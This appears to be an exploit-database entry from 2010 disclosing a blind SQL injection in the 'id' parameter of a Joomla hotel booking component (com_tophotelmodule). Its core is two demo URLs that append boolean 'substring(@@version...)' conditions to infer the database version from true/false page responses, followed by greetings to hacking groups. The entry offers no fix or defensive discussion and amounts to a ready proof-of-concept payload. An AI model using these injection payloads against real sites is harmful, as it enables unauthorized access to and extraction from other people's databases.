Joomla! Component Regional Booking - 'id' Blind SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2010-01-06  
date_updated:   
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 11061.txt  

Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.IQ-TY.com/vb

___________________________________

script : http://www.joomlahbs.com/


Demo :
_______


http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )



http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )






Greetz : IQ-SecuritY Members | Milw0rM | SecurityReason
ALL Arabic Hack And Kurdish hack